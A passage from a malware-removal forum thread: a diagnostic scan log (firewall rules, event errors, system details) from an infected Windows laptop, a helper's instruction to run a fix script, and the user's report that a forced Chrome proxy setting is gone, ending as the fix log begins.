FirewallRules: [{574FEC6A-C2BD-4CB2-B413-67B7737E29E0}] => (Allow) C:\Program Files (x86)\HandsFree\Client\capp.exe
FirewallRules: [{31C323B7-73A7-4E39-8C85-400F1915821F}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cutil.exe
FirewallRules: [{EB7FE9F8-3F44-46F9-ACF7-EE1DA4D5ADAB}] => (Allow) C:\Program Files (x86)\HandsFree\Client\rerun.exe
FirewallRules: [{E62D432D-ECC4-4D15-9C26-938ABD27D760}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srvc.exe
FirewallRules: [{9D595EDF-D6A1-4098-8784-4DD3DF70EA17}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srtct.exe
FirewallRules: [{35F5F446-E0E4-4FB4-A3E3-668215BE807C}] => (Allow) C:\Program Files (x86)\HandsFree\Client\Tools\Browser.exe
FirewallRules: [{43FD2C28-07C4-487B-A687-24B5484333D7}] => (Allow) C:\Program Files (x86)\HandsFree\Client\intfr.exe
FirewallRules: [{69ED7FDB-F94D-493C-8C35-A9EAD7B510ED}] => (Allow) C:\Program Files (x86)\HandsFree\Client\dmidecode.exe
FirewallRules: [{186F7A03-E19A-486E-8D87-FB28D2199045}] => (Allow) C:\Program Files (x86)\HandsFree\Client\custicn.exe
FirewallRules: [{0CF98C4C-4E35-4731-853B-02D08E49D714}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cust.exe
FirewallRules: [{AC5C7EC9-D8A8-4472-B2CD-E1FF0E3E142C}] => (Allow) C:\Program Files (x86)\HandsFree\Client\capp.exe
FirewallRules: [{4C4A0BD5-582A-4B59-9E2B-3FEF30269684}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srvc.exe
FirewallRules: [{68691C0D-E59F-46C4-8166-45142B9FE830}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cutil.exe
FirewallRules: [{DD16505B-A2A8-4EB0-8374-B6C127CD1A98}] => (Allow) C:\Program Files (x86)\HandsFree\Client\rerun.exe
FirewallRules: [{FD2400B7-2282-49D3-A08C-6727604F9D2B}] => (Allow) C:\Program Files (x86)\HandsFree\Client\custicn.exe
FirewallRules: [{28E81E42-4896-4602-8E7E-70C018D8384A}] => (Allow) C:\Program Files (x86)\HandsFree\Client\intfr.exe
FirewallRules: [{97A3C09F-C8B2-490F-ACFB-E10580F175F4}] => (Allow) C:\Program Files (x86)\HandsFree\Client\dmidecode.exe
FirewallRules: [{D8915FC4-6A01-4D46-8849-E01D84D68E3D}] => (Allow) C:\Program Files (x86)\HandsFree\Client\Tools\Browser.exe
FirewallRules: [{0CC3AA21-01B3-4EEB-AD3E-68C0FF1F27AD}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srtct.exe
FirewallRules: [{CDED8D2B-5119-4CE0-9A5F-957D8C16FCF4}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srtct.exe
FirewallRules: [{24E4064D-297D-4C0E-AB15-3292987D77CB}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cutil.exe
FirewallRules: [{0B28C5B6-5F32-4B6E-A683-F0D8F0BCA1C5}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cust.exe
FirewallRules: [{85559A6A-F702-44D8-A48D-37A3CE6CB451}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srvc.exe
FirewallRules: [{0843B41D-94F9-40FE-BBC3-9E8B5E7D2C0A}] => (Allow) C:\Program Files (x86)\HandsFree\Client\capp.exe
FirewallRules: [{4CC002EE-2673-48FF-8647-D0A25391EBBE}] => (Allow) C:\Program Files (x86)\HandsFree\Client\rerun.exe
FirewallRules: [{6B2EE850-9968-491A-AE31-D462279C3C31}] => (Allow) C:\Program Files (x86)\HandsFree\Client\Tools\Browser.exe
FirewallRules: [{49AF2DEA-28E2-4190-95D0-5508BFA9D075}] => (Allow) C:\Program Files (x86)\HandsFree\Client\dmidecode.exe
FirewallRules: [{5A0B2834-3592-4291-82E3-B56C71D1D36A}] => (Allow) C:\Program Files (x86)\HandsFree\Client\custicn.exe
FirewallRules: [{56A5964C-D068-44C8-B266-BE224FF00542}] => (Allow) C:\Program Files (x86)\HandsFree\Client\intfr.exe
FirewallRules: [{4A9900B9-4BFC-4F95-ADDA-20AA79052D34}] => (Allow) C:\Program Files (x86)\HandsFree\Client\dmidecode.exe
FirewallRules: [{E23E38B0-9042-4555-9EC3-0FC8920E8520}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srtct.exe
FirewallRules: [{0F496DE0-57F9-48D3-B7C6-96DC4F271DDB}] => (Allow) C:\Program Files (x86)\HandsFree\Client\intfr.exe
FirewallRules: [{FCE7DF8F-4720-4077-8BCE-0EC11A397772}] => (Allow) C:\Program Files (x86)\HandsFree\Client\Tools\Browser.exe
FirewallRules: [{F7BF0682-AA6D-4676-BE0B-35502B81C286}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cutil.exe
FirewallRules: [{1D83FD07-ECC3-4C40-84FD-32C69AFA39F0}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srvc.exe
FirewallRules: [{A3AC9AC2-5FCF-4183-A626-1762AD257477}] => (Allow) C:\Program Files (x86)\HandsFree\Client\custicn.exe
FirewallRules: [{882089C8-DF48-41E6-B367-9483838F1F75}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cust.exe
FirewallRules: [{2ACA4851-A04D-46E5-B3A4-9865FD4516FC}] => (Allow) C:\Program Files (x86)\HandsFree\Client\rerun.exe
FirewallRules: [{14B07EC7-6D5E-48CB-B854-6BB934DCAEB5}] => (Allow) C:\Program Files (x86)\HandsFree\Client\capp.exe
FirewallRules: [{B954F3F4-7C34-480C-9C4A-FEFC48DF3F4C}] => (Allow) LPort=443
FirewallRules: [{7FF32026-3A6A-44CE-9D20-92785562222D}] => (Allow) LPort=443
FirewallRules: [{850068C2-A888-4FEF-97EA-5DD140FE6E45}] => (Allow) LPort=37674
FirewallRules: [{006F0617-B1AB-407C-9D8F-48E79401B08C}] => (Allow) LPort=37674
FirewallRules: [{978761AF-D232-43F1-93DD-BDC601E740CD}] => (Allow) LPort=37675
FirewallRules: [TCP Query User{356EF7AC-1295-445B-8E96-16DF65FC2B32}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [UDP Query User{3EC1271C-6002-436B-BE6B-7D67A58E0BE7}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [{EF30CC4B-E7CD-4C19-8864-844941220A0F}] => (Block) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [{08564573-FC85-4F28-A36B-7EF9AFD14572}] => (Block) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [{B581D952-D1ED-4050-AE44-C3A95E57890A}] => (Allow) C:\Users\dell 2\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{AC35F5D9-25C0-4E87-A000-01F81AA2EDCF}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1544\Agent.exe
FirewallRules: [{A43E1B28-F129-4F6C-8B92-1CAB28983179}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1544\Agent.exe
FirewallRules: [{0241A554-53E1-4CD0-A3A0-854337E79975}] => (Allow) C:\Program Files (x86)\Ventrilo\Ventrilo.exe
FirewallRules: [{3635AD1B-7881-4D72-BEFF-F35BB0AE9633}] => (Allow) C:\Program Files (x86)\Ventrilo\Ventrilo.exe
FirewallRules: [{47791F25-424B-4FF4-9C83-C4BEF7A7B264}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2689\Agent.exe
FirewallRules: [{4E514FDF-604B-44A6-B5D6-A4BCFA73F2AC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2689\Agent.exe
FirewallRules: [{AF240B9D-47FE-441C-9419-AC9ED0329B2B}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{A695D948-09E5-4360-9BBB-9CF569B3DD00}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{EBF5146F-6709-4E1C-9342-DE16D6BE9F72}] => (Allow) C:\Program Files (x86)\Hearthstone\Hearthstone.exe
FirewallRules: [{57CFC2AD-7018-4C2E-B249-C4031308E17B}] => (Allow) C:\Program Files (x86)\Hearthstone\Hearthstone.exe
FirewallRules: [{54D606E5-829F-4F78-A8C5-B2724991668C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2717\Agent.exe
FirewallRules: [{8F23CE5A-2E27-4310-807D-47B0F377A309}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2717\Agent.exe
FirewallRules: [{EEE488E3-9AF6-48F1-8F42-DB7A29254B60}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{B74D992C-928D-44E1-8187-53351220628A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{2DA4E656-4EC5-4C27-8474-E547776FDB4F}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{CB7DF9F6-BB29-4A81-B9A1-EA37BF443196}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{AA0940D6-889B-4E23-B355-0B232F61B8A7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{5A05912B-3D46-4CE8-A47D-8F3D256B6D5F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{408323C1-F8CA-498D-9194-12808928840B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{7403D727-5D8E-4260-9764-49903546CFD5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{F8B7ECE8-744D-4187-B1FC-B8140E8DBCC4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2787\Agent.exe
FirewallRules: [{B4B8096F-3B67-49A2-83FD-792544327A53}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2787\Agent.exe
FirewallRules: [{1AC53FFC-88D4-4162-B5D6-45D601CE94AC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{D8A32B80-5F5F-463C-8823-0212301484CE}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{A89B9C59-4E48-4B88-B854-9E8AA60C799A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{0F89E704-9F21-4D9A-93AF-808C9F83BEC0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{B5DF661A-F970-45F1-921C-BFFEBD6B873C}] => (Allow) C:\Program Files (x86)\Heroes of the Storm\Support\HeroesSwitcher.exe
FirewallRules: [{336E3C4E-2240-48CA-A9F7-86E4AA2A0D5F}] => (Allow) C:\Program Files (x86)\Heroes of the Storm\Support\HeroesSwitcher.exe
FirewallRules: [{BB54CFBA-9CDC-4916-95F7-F9AA7C1EE97B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3023\Agent.exe
FirewallRules: [{8A3F5458-C801-464E-8454-BFB7CEF45DFE}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3023\Agent.exe
FirewallRules: [{A8548BB1-46F4-435E-97D6-B5A6A0B118F7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
FirewallRules: [{DE58110B-3DAD-4532-A1F7-1E6A73B225A6}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
FirewallRules: [{5F252E11-7A4F-4656-AA4D-F9352E6CB678}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
FirewallRules: [{FEE354D0-710A-430A-A48A-1F87534A8E00}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
FirewallRules: [{0E161FBB-EA00-4BE9-B893-904D0C338F1D}] => (Allow) C:\Program Files (x86)\Diablo III\Diablo III.exe
FirewallRules: [{E1465191-8F0A-4251-860A-F6690D49D75F}] => (Allow) C:\Program Files (x86)\Diablo III\Diablo III.exe
FirewallRules: [{AD1F079B-4AA0-453C-8303-1F1F32F6F3F4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
FirewallRules: [{DB0D641B-D05D-4B24-BEDB-128859F903C0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
FirewallRules: [{8444123C-DBFD-4C93-BDFD-22ADD0753D20}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{5F1D35E8-AE8A-4515-8967-49F9D7D58A2D}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{5E6F8012-83D0-48D2-9E25-34BA984DEC8E}] => (Allow) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer.exe
FirewallRules: [{6878FBD7-6B20-4FA3-9462-2655B8681ADD}] => (Allow) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer.exe
FirewallRules: [{5E1DCF3B-F824-4220-B498-67EB9B3936FA}] => (Allow) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe
FirewallRules: [{ABB480BC-B785-4806-BEEE-5CF58AD23290}] => (Allow) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe
FirewallRules: [{407B09C2-3099-4E7E-8656-8F15AC4E6518}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{788337FA-096D-438E-B5E5-26EE335FAEC7}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{D02BBE59-236E-482F-B722-27DDAAF9C8C2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
FirewallRules: [{B20EFA7B-EECB-4CC2-9A1C-BC2D5CDB9BEA}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
FirewallRules: [{B0C961A9-EA7A-4B28-AE50-C21837C94647}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
FirewallRules: [{168BE11E-E9F0-4A40-B678-D3BA7A55704B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
FirewallRules: [{5E2F99FB-7A3A-482E-9251-E341A55DB428}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
FirewallRules: [{DA8CF607-601A-4E93-B194-7B3EB09E16A2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
FirewallRules: [{E6DB926F-D91D-4DFE-929D-419A28295F4F}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3332\Agent.exe
FirewallRules: [{9E60B088-D54C-45E5-9F5F-E407B2A6751A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3332\Agent.exe
FirewallRules: [{CB74F407-8BF9-4B3F-A33E-6361FA568CF3}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
FirewallRules: [{ED7C897A-D036-45E7-AB7C-C497A05B30DF}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
FirewallRules: [TCP Query User{D67C19DB-0499-4473-85B8-19CA62538BFF}C:\programdata\battle.net\agent\agent.3346\agent.exe] => (Allow) C:\programdata\battle.net\agent\agent.3346\agent.exe
FirewallRules: [UDP Query User{CA86FB25-076E-41CF-99B2-8229FF678977}C:\programdata\battle.net\agent\agent.3346\agent.exe] => (Allow) C:\programdata\battle.net\agent\agent.3346\agent.exe
FirewallRules: [{0F123B24-DCB2-45B7-B7CD-D21473941FCD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
FirewallRules: [{E8461A57-E534-4D3B-93CE-59EAF7C635D5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
FirewallRules: [{C0F9F96E-0E8C-45B4-A4F0-3B66D8C85FE1}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Age2HD\Launcher.exe
FirewallRules: [{C4552CFD-AB3F-4785-B442-2A78311BD551}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Age2HD\Launcher.exe
FirewallRules: [{3507CC7E-D5CD-4245-AF82-E9435D2F4AC7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
FirewallRules: [{6B6D5D4A-D47B-40B5-8AB7-A34899A2D462}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
FirewallRules: [{64C7AE70-53F8-4278-BC2F-4309CE728880}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Medieval II Total War\medieval2.exe
FirewallRules: [{528986DF-75CD-4287-AA5A-C5C1CC7F90C5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Medieval II Total War\medieval2.exe
FirewallRules: [{35865838-D827-4111-A81C-C28CFC5E8BCC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3427\Agent.exe
FirewallRules: [{22194AB5-C31B-41E7-93E6-435AF47B4BAB}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3427\Agent.exe
FirewallRules: [{20C442B8-FD67-4C19-B407-CCCD61C52982}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3454\Agent.exe
FirewallRules: [{AB0AFF5B-772F-4E5D-86C2-A9664D528C06}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3454\Agent.exe
FirewallRules: [{DC911188-9986-4B4D-B9E9-4B59F97814C3}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [{DDC46D0D-4A61-47EB-A014-9B409079BD89}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [{77AFBCBF-259E-405F-8F84-AFA6D8AA1802}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3507\Agent.exe
FirewallRules: [{A8DA912D-5AB0-4471-8FD1-8245A28FE491}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3507\Agent.exe
FirewallRules: [{D864F12F-3ADF-4110-935A-4E0A0F4B75C8}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{C595C5F1-F2AB-4A30-AFF9-EBDEDCED5DDD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{91586FBA-C64C-4584-89C7-F52554713A38}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3632\Agent.exe
FirewallRules: [{048D9C1E-406E-4F55-B8D8-11898CB738BF}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3632\Agent.exe
FirewallRules: [{A657B89E-CF70-4AE9-A40A-5B9C1FF4037D}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3634\Agent.exe
FirewallRules: [{550E7323-439F-420E-BADF-F69CAD40A4BD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3634\Agent.exe
FirewallRules: [{A228C47F-5504-4E99-83AE-082357150C95}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3669\Agent.exe
FirewallRules: [{AFEDB7DE-7FAF-47D1-8E59-AF0C4075472D}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3669\Agent.exe
FirewallRules: [{70E0BB3D-0B0E-4511-B2B1-33A1AA840D69}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3688\Agent.exe
FirewallRules: [{C0FEC695-9354-4F2D-B6A1-6FEEAC0208AF}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3688\Agent.exe
FirewallRules: [{5D4882C9-5171-4D0A-AF7B-B00C413877C9}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3689\Agent.exe
FirewallRules: [{9F469E6C-A0C2-4764-9844-DC4D1CF4F2AD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3689\Agent.exe
FirewallRules: [{36A2901B-2EB6-4EC2-804C-33BDC2566208}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3715\Agent.exe
FirewallRules: [{87CBA83F-E293-45FE-B919-17EF09DFAFE1}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3715\Agent.exe
FirewallRules: [{4C418442-4F5C-4AF7-807A-50C5BE944698}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{E44A130D-AED8-4976-A3C1-571A4BFB6640}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Faulty Device Manager Devices =============
 
Name: Dell Wireless 375 Bluetooth Module
Description: Dell Wireless 375 Bluetooth Module
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Broadcom
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (06/08/2015 04:29:50 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Stream product id=0x0066): Streaming Failed
 
Error: (06/08/2015 04:29:15 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
Too many failures while downloading ranges: 2
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Cache Bytes
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Process\ID Process
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Page Faults/sec
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Pool Nonpaged Bytes
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Pool Paged Bytes
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Committed Bytes
 
Error: (06/08/2015 04:22:17 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:17.719-04:00| vthread-4| E105: Failed to read registry perf object Memory\Cache Bytes
 
Error: (06/08/2015 04:22:17 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:17.719-04:00| vthread-4| E105: Failed to read registry perf object Process\ID Process
 
 
System errors:
=============
Error: (06/08/2015 04:26:28 AM) (Source: WMPNetworkSvc) (EventID: 14332) (User: )
Description: Service 'WMPNetworkSvc' did not start correctly because CoCreateInstance(CLSID_UPnPDeviceFinder) encountered error '0x80004005'. Verify that the UPnPHost service is running and that the UPnPHost component of Windows is installed properly.
 
Error: (06/08/2015 04:25:42 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Trend Micro Client/Server Security Agent service failed to start due to the following error: 
%%1053
 
Error: (06/08/2015 04:25:42 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Trend Micro Client/Server Security Agent service to connect.
 
Error: (06/08/2015 04:24:38 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The HandsFree Client service failed to start due to the following error: 
%%2
 
Error: (06/08/2015 04:24:22 AM) (Source: NETLOGON) (EventID: 3095) (User: )
Description: This computer is configured as a member of a workgroup, not as
a member of a domain. The Netlogon service does not need to run in this
configuration.
 
Error: (06/08/2015 04:24:20 AM) (Source: Microsoft-Windows-TaskScheduler) (EventID: 413) (User: NT AUTHORITY)
Description: Task Scheduler service failed to load tasks at service startup. Additional Data: Error Value: 2147942402.
 
Error: (06/08/2015 04:24:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NTRU TSS v1.2.1.34 TCS service depends on the TPM Base Services service which failed to start because of the following error: 
%%0
 
Error: (06/08/2015 04:16:21 AM) (Source: WMPNetworkSvc) (EventID: 14332) (User: )
Description: Service 'WMPNetworkSvc' did not start correctly because CoCreateInstance(CLSID_UPnPDeviceFinder) encountered error '0x80070420'. Verify that the UPnPHost service is running and that the UPnPHost component of Windows is installed properly.
 
Error: (06/08/2015 04:13:50 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The HandsFree Client service failed to start due to the following error: 
%%2
 
Error: (06/08/2015 04:13:40 AM) (Source: NETLOGON) (EventID: 3095) (User: )
Description: This computer is configured as a member of a workgroup, not as
a member of a domain. The Netlogon service does not need to run in this
configuration.
 
 
Microsoft Office:
=========================
Error: (06/08/2015 04:29:50 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: (Stream product id=0x0066): Streaming Failed
 
Error: (06/08/2015 04:29:15 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Too many failures while downloading ranges: 2
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Cache Bytes
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Process\ID Process
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Page Faults/sec
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Pool Nonpaged Bytes
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Pool Paged Bytes
 
Error: (06/08/2015 04:22:22 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:22.726-04:00| vthread-4| E105: Failed to read registry perf object Memory\Committed Bytes
 
Error: (06/08/2015 04:22:17 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:17.719-04:00| vthread-4| E105: Failed to read registry perf object Memory\Cache Bytes
 
Error: (06/08/2015 04:22:17 AM) (Source: vmauthd) (EventID: 1000) (User: )
Description: 2015-06-08T04:22:17.719-04:00| vthread-4| E105: Failed to read registry perf object Process\ID Process
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-2520M CPU @ 2.50GHz
Percentage of memory in use: 67%
Total physical RAM: 3992.93 MB
Available physical RAM: 1279.81 MB
Total Pagefile: 7984.07 MB
Available Pagefile: 4403.53 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:450.57 GB) (Free:145 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 18914F7C)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=15.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450.6 GB) - (Type=07 NTFS)
 
==================== End of log ============================


#4 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:09:00 AM

Posted 08 June 2015 - 12:51 PM

Hi,
 
 
Please download the following file => [attachment=165827:fixlist.txt] and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

Let me know how are things after the fix above.
 
 
Regards,
Georgi


cXfZ4wS.png


#5 Mohasaiyan

Mohasaiyan
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:02:00 AM

Posted 08 June 2015 - 03:52 PM

Dude, the most difficult symptom seems to have been removed man thanks a lot. Chrome would not allow me to change my proxy settings even though I had managed to do that on windows. Chrome kept telling me that proxy settings are enforced by admin even though I am the admin on this cpu. Now there is no trace of that symptom of the virus. I cannot thank you enough. Here is the requested log I am going to run a scan with adware cleaner and norton and will update you after that. I dunno if we are done here but either way I cannot thank you enough.

 

Fix result of Farbar Recovery Scan Tool (x64) Version:07-06-2015
Ran by dell 2 at 2015-06-08 16:32:12 Run:1
Running from C:\Users\dell 2\Downloads
Loaded Profiles: dell 2 & MSSQL$SQLEXPRESS (Available Profiles: dell 2 & MSSQL$SQLEXPRESS & Classic .NET AppPool & localhost & DefaultAppPool)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
